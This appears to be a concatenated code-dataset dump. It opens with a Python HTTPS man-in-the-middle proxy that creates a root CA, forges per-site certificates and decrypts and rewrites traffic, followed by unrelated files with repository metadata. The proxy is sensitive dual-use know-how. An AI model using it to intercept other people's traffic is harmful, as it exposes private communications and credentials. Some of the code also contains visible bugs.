self.url = "" # 无协议头
# 这是请求
self.command = None
self.path = None
self.request_version = None
# 这是响应
self.response_version = None
self.status = None
self.reason = None
self._headers = None
self._body = b""
def parse_headers(self, headers_str):
"""
暂时用不到
:param headers:
:return:
"""
header_list = headers_str.rstrip("\r\n").split("\r\n")
headers = {}
for header in header_list:
[key, value] = header.split(": ")
headers[key.lower()] = value
return headers
def to_data(self):
raise NotImplementedError("function to_data need override")
def set_headers(self, headers):
headers_tmp = {}
for k, v in headers.items():
headers_tmp[k.lower()] = v
self._headers = headers_tmp
def build_headers(self):
"""
返回headers字符串
:return:
"""
header_str = ""
for k, v in self._headers.items():
header_str += k + ": " + v + "\r\n"
return header_str
def get_header(self, key):
if isinstance(key, str):
return self._headers.get(key.lower(), None)
raise Exception("parameter should be str")
@property
def headers(self):
"""
获取头部信息
:return:
"""
return self._headers
def set_header(self, key, value):
"""
设置头部
:param key:
:param value:
:return:
"""
if isinstance(key, str) and isinstance(value, str):
self._headers[key.lower()] = value
return
raise Exception("parameter should be str")
def get_body_data(self):
"""
返回是字节格式的body内容
:return:
"""
return self._body
def set_body_data(self, body):
if isinstance(body, bytes):
self._body = body
self.set_header("Content-length", str(len(body)))
return
raise Exception("parameter should be bytes")
class Request(HttpTransfer):
def __init__(self, req):
HttpTransfer.__init__(self)
self.hostname = req.hostname
self.port = req.port
# 这是请求
self.command = req.command
self.path = req.path
self.request_version = req.request_version
self.url = req.hostname + req.path
self.set_headers(req.headers)
if self.get_header("Content-Length"):
self.set_body_data(req.rfile.read(int(self.get_header("Content-Length"))))
def to_data(self):
# Build request
req_data = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
# Add headers to the request
req_data += "%s\r\n" % self.build_headers()
req_data = req_data.encode("utf-8")
req_data += self.get_body_data()
return req_data
class Response(HttpTransfer):
def __init__(self, request, proxy_socket):
HttpTransfer.__init__(self)
self.request = request
h = HTTPResponse(proxy_socket)
h.begin()
##HTTPResponse会将所有chunk拼接到一起,因此会直接得到所有内容,所以不能有Transfer-Encoding
del h.msg["Transfer-Encoding"]
del h.msg["Content-Length"]
self.response_version = self.version_dict[h.version]
self.status = h.status
self.reason = h.reason
self.set_headers(h.msg)
body_data = self._decode_content_body(
h.read(), self.get_header("Content-Encoding")
)
self.set_body_data(body_data)
self._text() # 尝试将文本进行解码
h.close()
proxy_socket.close()
def _text(self):
body_data = self.get_body_data()
if self.get_header("Content-Type") and (
"text" or "javascript"
) in self.get_header("Content-Type"):
self.decoding = chardet.detect(body_data)["encoding"] # 探测当前的编码
if self.decoding:
try:
self._body_str = body_data.decode(self.decoding) # 请求体
except Exception as e:
self._body_str = body_data
self.decoding = None
else:
self._body_str = body_data
else:
self._body_str = body_data
self.decoding = None
def get_text(self, decoding=None):
if decoding:
return self.get_body_data().decode(decoding)
return self.get_body_data().decode()
def set_body_str(self, body_str, encoding=None):
if isinstance(body_str, str):
if encoding:
self.set_body_data(body_str.encode(encoding))
else:
self.set_body_data(
body_str.encode(self.decoding if self.decoding else "utf-8")
)
self._body_str = body_str
return
raise Exception("parameter should be str")
def _encode_content_body(self, text, encoding):
if encoding == "identity":
data = text
elif encoding in ("gzip", "x-gzip"):
gzip_compress = zlib.compressobj(9, zlib.DEFLATED, zlib.MAX_WBITS | 16)
data = gzip_compress.compress(text) + gzip_compress.flush()
elif encoding == "deflate":
data = zlib.compress(text)
else:
data = text
return data
def _decode_content_body(self, data, encoding):
if encoding == "identity": # 没有压缩
text = data
elif encoding in ("gzip", "x-gzip"): # gzip压缩
text = zlib.decompress(data, 16 + zlib.MAX_WBITS)
elif encoding == "deflate": # zip压缩
try:
text = zlib.decompress(data)
except zlib.error:
text = zlib.decompress(data, -zlib.MAX_WBITS)
else:
text = data
self.set_header("Content-Encoding", "identity") # 没有压缩
return text
def to_data(self):
res_data = "%s %s %s\r\n" % (self.response_version, self.status, self.reason)
res_data += "%s\r\n" % self.build_headers()
res_data = res_data.encode(self.decoding if self.decoding else "utf-8")
res_data += self.get_body_data()
return res_data
class CAAuth(object):
"""
用于CA证书的生成以及代理证书的自签名
"""
def __init__(self, ca_file="ca.pem", cert_file="ca.crt"):
self.ca_file_path = ca_file
self.cert_file_path = cert_file
self._gen_ca() # 生成CA证书,需要添加到浏览器的合法证书机构中
def _gen_ca(self, again=False):
# Generate key
# 如果证书存在而且不是强制生成,直接返回证书信息
if (
os.path.exists(self.ca_file_path)
and os.path.exists(self.cert_file_path)
and not again
):
self._read_ca(self.ca_file_path) # 读取证书信息
return
self.key = PKey()
self.key.generate_key(TYPE_RSA, 2048)
# Generate certificate
self.cert = X509()
self.cert.set_version(2)
self.cert.set_serial_number(1)
self.cert.get_subject().CN = "baseproxy"
self.cert.gmtime_adj_notBefore(0)
self.cert.gmtime_adj_notAfter(315360000) # 十年
self.cert.set_issuer(self.cert.get_subject())
self.cert.set_pubkey(self.key)
self.cert.add_extensions(
[
X509Extension(b"basicConstraints", True, b"CA:TRUE, pathlen:0"),
X509Extension(b"keyUsage", True, b"keyCertSign, cRLSign"),
X509Extension(
b"subjectKeyIdentifier", False, b"hash", subject=self.cert
),
]
)
self.cert.sign(self.key, "sha256")
with open(self.ca_file_path, "wb+") as f:
f.write(dump_privatekey(FILETYPE_PEM, self.key))
f.write(dump_certificate(FILETYPE_PEM, self.cert))
with open(self.cert_file_path, "wb+") as f:
f.write(dump_certificate(FILETYPE_PEM, self.cert))
def _read_ca(self, file):
self.cert = load_certificate(FILETYPE_PEM, open(file, "rb").read())
self.key = load_privatekey(FILETYPE_PEM, open(file, "rb").read())
def __getitem__(self, cn):
# 将为每个域名生成的服务器证书,放到临时目录中
cache_dir = gettempdir()
root_dir = os.path.join(cache_dir, "baseproxy")
if not os.path.exists(root_dir):
os.makedirs(root_dir)
cnp = os.path.join(root_dir, "baseproxy_{}.pem".format(cn))
if not os.path.exists(cnp):
self._sign_ca(cn, cnp)
return cnp
def _sign_ca(self, cn, cnp):
# 使用合法的CA证书为代理程序生成服务器证书
# create certificate
try:
key = PKey()
key.generate_key(TYPE_RSA, 2048)
# Generate CSR
req = X509Req()
req.get_subject().CN = cn
req.set_pubkey(key)
req.sign(key, "sha256")
# Sign CSR
cert = X509()
cert.set_version(2)
cert.set_subject(req.get_subject())
cert.set_serial_number(self.serial)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(31536000) # 一年
cert.set_issuer(self.cert.get_subject())
ss = ("DNS:%s" % cn).encode(encoding="utf-8")
cert.add_extensions([X509Extension(b"subjectAltName", False, ss)])
cert.set_pubkey(req.get_pubkey())
cert.sign(self.key, "sha256")
with open(cnp, "wb+") as f:
f.write(dump_privatekey(FILETYPE_PEM, key))
f.write(dump_certificate(FILETYPE_PEM, cert))
except Exception as e:
raise Exception("generate CA fail:{}".format(str(e)))
@property
def serial(self):
return int("%d" % (time.time() * 1000))
class ProxyHandle(BaseHTTPRequestHandler):
def __init__(self, request, client_addr, server):
self.is_connected = False
self.hook_init()
BaseHTTPRequestHandler.__init__(self, request, client_addr, server)
def hook_init(self):
# 增加初始化的其他操作,如初始化filter_url_lst
self.filter_url_lst = []
def do_CONNECT(self):
"""
处理https连接请求
:return:
"""
self.is_connected = True # 用来标识是否之前经历过CONNECT
if self.server.https:
self.connect_intercept()
else:
self.connect_relay()
def do_GET(self):
"""
处理GET请求
:return:
"""
if self.path == "http://baseproxy.ca/":
self._send_ca()
return
if not self.is_connected:
# 如果不是https,需要连接http服务器
try:
self._proxy_to_dst()
except Exception as e:
self.send_error(500, "{} connect fail ".format(self.hostname))
return
# 这里就是代理发送请求,并接收响应信息
request = Request(self)
# 增加过滤模块
flag = False
for filter_x in self.filter_url_lst:
if filter_x in request.url:
flag = True
break
if flag:
request = self.mitm_request(request)
if request:
self._proxy_sock.sendall(request.to_data())
# 将响应信息返回给客户端
response = Response(request, self._proxy_sock)
if flag:
response = self.mitm_response(response)
if response:
self.request.sendall(response.to_data())
else:
self.send_error(404, "response is None")
else:
self.send_error(404, "request is None")
do_HEAD = do_GET
do_POST = do_GET
do_PUT = do_GET
do_DELETE = do_GET
do_OPTIONS = do_GET
def _proxy_to_ssldst(self):
"""
代理连接https目标服务器
:return:
"""
##确定一下目标的服务器的地址与端口
# 如果之前经历过connect
# CONNECT www.baidu.com:443 HTTP 1.1
self.hostname, self.port = self.path.split(":")
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
# 进行SSL包裹
self._proxy_sock = wrap_socket(self._proxy_sock)
def _proxy_to_dst(self):
# 代理连接http目标服务器
# http请求的self.path 类似http://www.baidu.com:80/index.html
u = urlparse(self.path)
if u.scheme != "http":
raise Exception("Unknown scheme %s" % repr(u.scheme))
self.hostname = u.hostname
self.port = u.port or 80
# 将path重新封装,比如http://www.baidu.com:80/index.html会变成 /index.html
self.path = urlunparse(
ParseResult(
scheme="",
netloc="",
params=u.params,
path=u.path or "/",
query=u.query,
fragment=u.fragment,
)
)
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
def connect_intercept(self):
"""
需要解析https报文,包装socket
:return:
"""
try:
# 首先建立和目标服务器的链接
self._proxy_to_ssldst()
# 建立成功后,proxy需要给client回复建立成功
self.send_response(200, "Connection established")
self.end_headers()
# 这个时候需要将客户端的socket包装成sslsocket,这个时候的self.path类似www.baidu.com:443,根据域名使用相应的证书
self.request = wrap_socket(
self.request,
server_side=True,
certfile=self.server.ca[self.path.split(":")[0]],
)
except SSLError:
self.send_error(500, "更新证书!")
return
except Exception as e:
self.send_error(500, str(e))
return
self.setup()
self.ssl_host = "https://%s" % self.path
try:
self.handle_one_request()
except Exception as e:
return
def connect_relay(self):
"""
对于https报文直接转发
"""
self.hostname, self.port = self.path.split(":")
try:
self._proxy_sock = socket()
self._proxy_sock.settimeout(10)
self._proxy_sock.connect((self.hostname, int(self.port)))
except Exception as e:
self.send_error(500)
return
self.send_response(200, "Connection Established")
self.end_headers()
inputs = [self.request, self._proxy_sock]
while True:
readable, writeable, errs = select.select(inputs, [], inputs, 10)
if errs:
break
for r in readable:
data = r.recv(8092)
if data:
if r is self.request:
self._proxy_sock.sendall(data)
elif r is self._proxy_sock:
self.request.sendall(data)
else:
break
self.request.close()
self._proxy_sock.close()
def _send_ca(self):
# 发送CA证书给用户进行安装并信任
cert_path = self.server.ca.cert_file_path
with open(cert_path, "rb") as f:
data = f.read()
self.send_response(200)
self.send_header("Content-Type", "application/x-x509-ca-cert")
self.send_header("Content-Length", len(data))
self.send_header("Connection", "close")
self.end_headers()
self.wfile.write(data)
def mitm_request(self, req):
for p in self.server.req_plugs:
req = p(self.server).deal_request(req)
return req
def mitm_response(self, rsp):
for p in self.server.rsp_plugs:
rsp = p(self.server).deal_response(rsp)
return rsp
class MitmProxy(ThreadingMixIn, HTTPServer):
def __init__(
self,
server_addr=("", 8080),
RequestHandlerClass=ProxyHandle,
bind_and_activate=True,
https=True,
ca_file="ca.pem",
cert_file="ca.crt",
):
HTTPServer.__init__(self, server_addr, RequestHandlerClass, bind_and_activate)
logging.info(
"HTTPServer is running at address( %s , %d )......"
% (server_addr[0], server_addr[1])
)
self.req_plugs = [] ##请求拦截插件列表
self.rsp_plugs = [] ##响应拦截插件列表
self.ca = CAAuth(ca_file=ca_file, cert_file=cert_file)
self.https = https
def register(self, intercept_plug):
if not issubclass(intercept_plug, InterceptPlug):
raise Exception(
"Expected type InterceptPlug got %s instead" % type(intercept_plug)
)
if issubclass(intercept_plug, ReqIntercept):
self.req_plugs.append(intercept_plug)
if issubclass(intercept_plug, RspIntercept):
self.rsp_plugs.append(intercept_plug)
class AsyncMitmProxy(MitmProxy):
pass
class InterceptPlug(object):
def __init__(self, server):
self.server = server
class ReqIntercept(InterceptPlug):
def deal_request(self, request):
pass
class RspIntercept(InterceptPlug):
def deal_response(self, response):
pass
| 11,273
| 6,084
| 740
|
4743e2afb0612962f02991b2d1548016f9ee41de
| 3,134
|
py
|
Python
|
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | 1
|
2019-10-17T15:57:45.000Z
|
2019-10-17T15:57:45.000Z
|
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | null | null | null |
gen_create.py
|
pdebuyl/f90h5md
|
538bda2eebd5474489d963e16175aecdb750ab4d
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2011-2013 Pierre de Buyl
#
# This file is part of f90h5md
#
# f90h5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
types = dict()
types['i'] = 'integer'
types['d'] = 'double precision'
H5T = dict()
H5T['i'] = 'H5T_NATIVE_INTEGER'
H5T['d'] = 'H5T_NATIVE_DOUBLE'
dims = dict()
dims['s'] = ''
dims['1'] = '(:)'
dims['2'] = '(:,:)'
dims['3'] = '(:,:,:)'
dims['4'] = '(:,:,:,:)'
for t_k,t_v in types.iteritems():
for d_k,d_v in dims.iteritems():
if (d_k == 's'):
rank = 1
else:
rank = int(d_k)+1
s=''
s+=""" !> Sets up a h5md_t variable.
!! @param file_id ID of the file.
!! @param name Name of the observable
!! @param ID Resulting h5md_t variable
!! @param data The data that will fit into the observable.
!! @param link_from Indicates if the step and time for this observable should be linked from another one.
!! @param override_obs Indicates if the data should be stored outside of /observables.
!! @private"""
s+="""
subroutine h5md_create_obs_%s%s(file_id, name, ID, data, link_from, override_obs)
integer(HID_T), intent(inout) :: file_id
character(len=*), intent(in) :: name
type(h5md_t), intent(out) :: ID
%s, intent(in) :: data%s
character(len=*), intent(in), optional :: link_from
character(len=*), intent(in), optional :: override_obs
integer(HID_T) :: file_s, plist, g_id
integer(HSIZE_T), allocatable :: dims(:), max_dims(:), chunk_dims(:)
integer :: rank
character(len=64) :: g_name
if (present(override_obs)) then
g_name = override_obs
else
g_name = 'observables'
end if
call h5gcreate_f(file_id, trim(g_name)//'/'//name, g_id, h5_error)
rank = %i
allocate(dims(rank)) ; allocate(max_dims(rank)) ; allocate(chunk_dims(rank))
""" % (t_k,d_k, t_v, d_v, rank )
if (d_k!='s'):
s+="""
dims(1:%i) = shape(data)
max_dims(1:%i) = shape(data)
chunk_dims(1:%i) = shape(data)
""" % (rank-1, rank-1, rank-1)
s+="""
dims(%i) = 0
max_dims(%i) = H5S_UNLIMITED_F
call h5screate_simple_f(rank, dims, file_s, h5_error, max_dims)
chunk_dims(%i) = 128
call h5pcreate_f(H5P_DATASET_CREATE_F, plist, h5_error)
call h5pset_chunk_f(plist, rank, chunk_dims, h5_error)
call h5dcreate_f(g_id, 'value', %s, file_s, ID%% d_id, h5_error, plist)
call h5pclose_f(plist, h5_error)
call h5sclose_f(file_s, h5_error)
deallocate(dims) ; deallocate(max_dims) ; deallocate(chunk_dims)
if (present(link_from)) then
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/step', g_id, 'step', h5_error)
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/time', g_id, 'time', h5_error)
else
call h5md_create_step_time(g_id)
end if
call h5dopen_f(g_id, 'step', ID%% s_id, h5_error)
call h5dopen_f(g_id, 'time', ID%% t_id, h5_error)
call h5gclose_f(g_id, h5_error)
end subroutine h5md_create_obs_%s%s
""" % (rank,rank,rank, H5T[t_k],t_k,d_k)
print s
| 30.72549
| 107
| 0.624442
|
#!/usr/bin/env python
# Copyright 2011-2013 Pierre de Buyl
#
# This file is part of f90h5md
#
# f90h5md is free software and is licensed under the modified BSD license (see
# LICENSE file).
types = dict()
types['i'] = 'integer'
types['d'] = 'double precision'
H5T = dict()
H5T['i'] = 'H5T_NATIVE_INTEGER'
H5T['d'] = 'H5T_NATIVE_DOUBLE'
dims = dict()
dims['s'] = ''
dims['1'] = '(:)'
dims['2'] = '(:,:)'
dims['3'] = '(:,:,:)'
dims['4'] = '(:,:,:,:)'
for t_k,t_v in types.iteritems():
for d_k,d_v in dims.iteritems():
if (d_k == 's'):
rank = 1
else:
rank = int(d_k)+1
s=''
s+=""" !> Sets up a h5md_t variable.
!! @param file_id ID of the file.
!! @param name Name of the observable
!! @param ID Resulting h5md_t variable
!! @param data The data that will fit into the observable.
!! @param link_from Indicates if the step and time for this observable should be linked from another one.
!! @param override_obs Indicates if the data should be stored outside of /observables.
!! @private"""
s+="""
subroutine h5md_create_obs_%s%s(file_id, name, ID, data, link_from, override_obs)
integer(HID_T), intent(inout) :: file_id
character(len=*), intent(in) :: name
type(h5md_t), intent(out) :: ID
%s, intent(in) :: data%s
character(len=*), intent(in), optional :: link_from
character(len=*), intent(in), optional :: override_obs
integer(HID_T) :: file_s, plist, g_id
integer(HSIZE_T), allocatable :: dims(:), max_dims(:), chunk_dims(:)
integer :: rank
character(len=64) :: g_name
if (present(override_obs)) then
g_name = override_obs
else
g_name = 'observables'
end if
call h5gcreate_f(file_id, trim(g_name)//'/'//name, g_id, h5_error)
rank = %i
allocate(dims(rank)) ; allocate(max_dims(rank)) ; allocate(chunk_dims(rank))
""" % (t_k,d_k, t_v, d_v, rank )
if (d_k!='s'):
s+="""
dims(1:%i) = shape(data)
max_dims(1:%i) = shape(data)
chunk_dims(1:%i) = shape(data)
""" % (rank-1, rank-1, rank-1)
s+="""
dims(%i) = 0
max_dims(%i) = H5S_UNLIMITED_F
call h5screate_simple_f(rank, dims, file_s, h5_error, max_dims)
chunk_dims(%i) = 128
call h5pcreate_f(H5P_DATASET_CREATE_F, plist, h5_error)
call h5pset_chunk_f(plist, rank, chunk_dims, h5_error)
call h5dcreate_f(g_id, 'value', %s, file_s, ID%% d_id, h5_error, plist)
call h5pclose_f(plist, h5_error)
call h5sclose_f(file_s, h5_error)
deallocate(dims) ; deallocate(max_dims) ; deallocate(chunk_dims)
if (present(link_from)) then
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/step', g_id, 'step', h5_error)
call h5lcreate_hard_f(file_id, trim(g_name)//'/'//link_from//'/time', g_id, 'time', h5_error)
else
call h5md_create_step_time(g_id)
end if
call h5dopen_f(g_id, 'step', ID%% s_id, h5_error)
call h5dopen_f(g_id, 'time', ID%% t_id, h5_error)
call h5gclose_f(g_id, h5_error)
end subroutine h5md_create_obs_%s%s
""" % (rank,rank,rank, H5T[t_k],t_k,d_k)
print s
| 0
| 0
| 0
|
9c74df1de285f8990eac45aebad0a4ff62e8d973
| 4,531
|
py
|
Python
|
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | null | null | null |
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | 7
|
2021-07-30T23:26:48.000Z
|
2021-10-05T21:34:36.000Z
|
scripts/dv_del.py
|
ubc-library-rc/dataverse_utils
|
3fbf3e90bba64b84fa141145a27a9ff787507eb7
|
[
"MIT"
] | null | null | null |
#!python
'''Dataverse Bulk Deleter
Deletes unpublished studies at the command line
'''
import argparse
#import json
import sys
import requests
VERSION = (0, 2, 1)
__version__ = '.'.join([str(x) for x in VERSION])
def delstudy(dvurl, key, pid):
'''
Deletes Dataverse study
dvurl : str
Dataverse installation base URL
key : str
Dataverse user API key
pid : str
Dataverse collection study persistent identifier
'''
try:
deler = requests.delete(f'{dvurl}/api/datasets/:persistentId/versions/:draft',
headers={'X-Dataverse-key':key},
params={'persistentId':pid},
timeout=30)
if deler.status_code == 200:
return f'Deleted {pid}'
deler.raise_for_status()
return None
except requests.exceptions.HTTPError:
return f'Failed to delete {pid}. \n Message: {deler.text}'
def conf(tex):
'''
Confirmation dialogue checker. Returns true if "Y" or "y"
'''
yes = input(f'Delete {tex}? ')
if yes.lower() == 'y':
return True
return False
def getsize(dvurl, pid, key):
'''
Returns size of Dataverse study. Mostly here for debugging.
dvurl : str
Dataverse installation base URL
pid : str
Dataverse collection study persistent identifier
key : str
Dataverse user API key
'''
try:
sizer = requests.get(f'{dvurl}/api/datasets/:persistentId/storagesize',
headers={'X-Dataverse-key':key},
params={'persistentId':pid},
timeout=10)
text = sizer.json()['data']['message']
text = text[text.rfind(':')+2 : -6]
text = text.split(',')
size = int(''.join(text))
sleeptime = text//1024//1024/10 # sleep for 1/10th sec per megabyte
return (size, sleeptime)
except requests.exceptions.HTTPError:
return (0, 0)
def main():
'''
Command line bulk deleter
'''
parser = argparse.ArgumentParser(description='Delete draft studies from a Dataverse collection')
parser.add_argument('-k', '--key', help='Dataverse user API key', required=True, dest='key')
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--dataverse',
help=('Dataverse collection short name from which '
'to delete all draft records. eg. "ldc"'),
dest='dataverse')
group.add_argument('-p', '--persistentId',
help='Handle or DOI to delete in format hdl:11272.1/FK2/12345',
dest='pid')
parser.add_argument('-i', '--interactive',
help="Confirm each study deletion",
action='store_true', dest='conf')
parser.add_argument('-u', '--url', help='URL to base Dataverse installation',
default='https://soroban.library.ubc.ca', dest='dvurl')
parser.add_argument('--version', action='version',
version='%(prog)s '+__version__,
help='Show version number and exit')
args = parser.parse_args()
args.dvurl = args.dvurl.strip('/')
if args.dataverse:
info = requests.get(f'{args.dvurl}/api/dataverses/{args.dataverse}/contents',
headers={'X-Dataverse-key': args.key}, timeout=10).json()
pids = [f'{x["protocol"]}:{x["authority"]}/{x["identifier"]}' for x in info['data']]
if not pids:
print(f'Dataverse collection {args.dataverse} empty')
for pid in pids:
try:
if args.conf:
if conf(pid):
print(delstudy(args.dvurl, args.key, pid))
continue
print(f'Skipping {pid}')
continue
print(delstudy(args.dvurl, args.key, pid))
#time.sleep(getsize(pid, args.key)[1])#Will this stop the server crash?
except KeyboardInterrupt:
print('Aborted by user')
sys.exit()
if args.pid:
if args.conf:
if conf(args.pid):
print(delstudy(args.dvurl, args.key, args.pid))
else:
print(f'Aborting delete of {args.pid}')
else:
print(delstudy(args.dvurl, args.key, args.pid))
if __name__ == '__main__':
main()
| 35.398438
| 100
| 0.546237
|
#!python
'''Dataverse Bulk Deleter
Deletes unpublished studies at the command line
'''
import argparse
#import json
import sys
import requests
VERSION = (0, 2, 1)
__version__ = '.'.join([str(x) for x in VERSION])
def delstudy(dvurl, key, pid):
'''
Deletes Dataverse study
dvurl : str
Dataverse installation base URL
key : str
Dataverse user API key
pid : str
Dataverse collection study persistent identifier
'''
try:
deler = requests.delete(f'{dvurl}/api/datasets/:persistentId/versions/:draft',
headers={'X-Dataverse-key':key},
params={'persistentId':pid},
timeout=30)
if deler.status_code == 200:
return f'Deleted {pid}'
deler.raise_for_status()
return None
except requests.exceptions.HTTPError:
return f'Failed to delete {pid}. \n Message: {deler.text}'
def conf(tex):
'''
Confirmation dialogue checker. Returns true if "Y" or "y"
'''
yes = input(f'Delete {tex}? ')
if yes.lower() == 'y':
return True
return False
def getsize(dvurl, pid, key):
'''
Returns size of Dataverse study. Mostly here for debugging.
dvurl : str
Dataverse installation base URL
pid : str
Dataverse collection study persistent identifier
key : str
Dataverse user API key
'''
try:
sizer = requests.get(f'{dvurl}/api/datasets/:persistentId/storagesize',
headers={'X-Dataverse-key':key},
params={'persistentId':pid},
timeout=10)
text = sizer.json()['data']['message']
text = text[text.rfind(':')+2 : -6]
text = text.split(',')
size = int(''.join(text))
sleeptime = text//1024//1024/10 # sleep for 1/10th sec per megabyte
return (size, sleeptime)
except requests.exceptions.HTTPError:
return (0, 0)
def main():
'''
Command line bulk deleter
'''
parser = argparse.ArgumentParser(description='Delete draft studies from a Dataverse collection')
parser.add_argument('-k', '--key', help='Dataverse user API key', required=True, dest='key')
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--dataverse',
help=('Dataverse collection short name from which '
'to delete all draft records. eg. "ldc"'),
dest='dataverse')
group.add_argument('-p', '--persistentId',
help='Handle or DOI to delete in format hdl:11272.1/FK2/12345',
dest='pid')
parser.add_argument('-i', '--interactive',
help="Confirm each study deletion",
action='store_true', dest='conf')
parser.add_argument('-u', '--url', help='URL to base Dataverse installation',
default='https://soroban.library.ubc.ca', dest='dvurl')
parser.add_argument('--version', action='version',
version='%(prog)s '+__version__,
help='Show version number and exit')
args = parser.parse_args()
args.dvurl = args.dvurl.strip('/')
if args.dataverse:
info = requests.get(f'{args.dvurl}/api/dataverses/{args.dataverse}/contents',
headers={'X-Dataverse-key': args.key}, timeout=10).json()
pids = [f'{x["protocol"]}:{x["authority"]}/{x["identifier"]}' for x in info['data']]
if not pids:
print(f'Dataverse collection {args.dataverse} empty')
for pid in pids:
try:
if args.conf:
if conf(pid):
print(delstudy(args.dvurl, args.key, pid))
continue
print(f'Skipping {pid}')
continue
print(delstudy(args.dvurl, args.key, pid))
#time.sleep(getsize(pid, args.key)[1])#Will this stop the server crash?
except KeyboardInterrupt:
print('Aborted by user')
sys.exit()
if args.pid:
if args.conf:
if conf(args.pid):
print(delstudy(args.dvurl, args.key, args.pid))
else:
print(f'Aborting delete of {args.pid}')
else:
print(delstudy(args.dvurl, args.key, args.pid))
if __name__ == '__main__':
main()
| 0
| 0
| 0
|
17b91ebb149ff794e7ab9e3c0e500dbf74dd6ee0
| 2,039
|
py
|
Python
|
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
src/common.py
|
nagisc007/pythoncitest
|
5200f1e8ae2969ffb733fb2239e9bbb7e700e836
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from acttypes import ActType
class Act(object):
""" basic action class.
"""
class Title(Act):
""" For title act
"""
class Chapter(Act):
""" For chapter start act
"""
class Description(Act):
""" Nothing subject description act.
"""
class Person(object):
""" basic character class.
"""
def tell(self, what, desc="", with_subject=False):
''' For dialogue
'''
return Act(self, ActType.TELL, "「{}」".format(what), desc, with_subject)
class Stage(object):
""" basic stage class.
"""
class Item(object):
""" basic item class.
"""
class DayTime(object):
""" basic day and time class.
"""
| 23.436782
| 83
| 0.583619
|
# -*- coding: utf-8 -*-
from acttypes import ActType
class Act(object):
""" basic action class.
"""
def __init__(self, subject, act_type, action, description, with_subject=False):
self.action = action
self.act_type = act_type
self.description = description
self.subject = subject
self.with_subject = with_subject
class Title(Act):
""" For title act
"""
def __init__(self, title, desc=""):
super().__init__(self, ActType.SYMBOL, title, desc)
class Chapter(Act):
""" For chapter start act
"""
def __init__(self, chapter_title, desc=""):
super().__init__(self, ActType.SYMBOL, chapter_title, desc)
class Description(Act):
""" Nothing subject description act.
"""
def __init__(self, act, desc=""):
super().__init__(self, ActType.DESC, act, desc)
class Person(object):
""" basic character class.
"""
def __init__(self, name, age, sex, job):
self.name = name
self.age = age
self.sex = sex
self.job = job
def tell(self, what, desc="", with_subject=False):
''' For dialogue
'''
return Act(self, ActType.TELL, "「{}」".format(what), desc, with_subject)
class Stage(object):
""" basic stage class.
"""
def __init__(self, name, act):
self.name = name
self.act = act
def description(self, desc=""):
return Act(self, ActType.DESC, self.act, desc)
class Item(object):
""" basic item class.
"""
def __init__(self, name, act):
self.name = name
self.act = act
def description(self, desc=""):
return Act(self, ActType.DESC, self.act, desc)
class DayTime(object):
""" basic day and time class.
"""
def __init__(self, act, mon=0, day=0, year=0, hour=0):
self.year = year
self.mon = mon
self.day = day
self.hour = hour
self.act = act
def description(self, desc=""):
return Act(self, ActType.DESC, self.act, desc)
| 1,037
| 0
| 289
|
3f6fab9af2fd1b2e838b7fc2b62a4615070a323a
| 644
|
py
|
Python
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-03-21T03:35:24.000Z
|
2021-04-20T05:49:19.000Z
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2018-06-20T11:33:43.000Z
|
2021-05-28T08:02:21.000Z
|
oauth2_provider/backends.py
|
grnspace/django-oauth-toolkit
|
3d876563a2528eadac0f832f360a0b269b99b94e
|
[
"BSD-2-Clause-FreeBSD"
] | 4
|
2018-06-20T11:14:46.000Z
|
2021-05-21T15:56:02.000Z
|
from django.contrib.auth import get_user_model
from .oauth2_backends import get_oauthlib_core
UserModel = get_user_model()
OAuthLibCore = get_oauthlib_core()
class OAuth2Backend:
"""
Authenticate against an OAuth2 access token
"""
| 23.851852
| 70
| 0.650621
|
from django.contrib.auth import get_user_model
from .oauth2_backends import get_oauthlib_core
UserModel = get_user_model()
OAuthLibCore = get_oauthlib_core()
class OAuth2Backend:
"""
Authenticate against an OAuth2 access token
"""
def authenticate(self, request=None, **credentials):
if request is not None:
valid, r = OAuthLibCore.verify_request(request, scopes=[])
if valid:
return r.user
return None
def get_user(self, user_id):
try:
return UserModel.objects.get(pk=user_id)
except UserModel.DoesNotExist:
return None
| 342
| 0
| 54
|
2249f1f9badf4ea52249baafff8509a9ed842631
| 875
|
py
|
Python
|
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
example/example_single_cell.py
|
Yuego/py3o.template
|
d89293d8154a880e5245df30515ace82effc77e1
|
[
"MIT"
] | null | null | null |
from py3o.template import Template
t = Template(
"py3o_example_template_single_cell.odt",
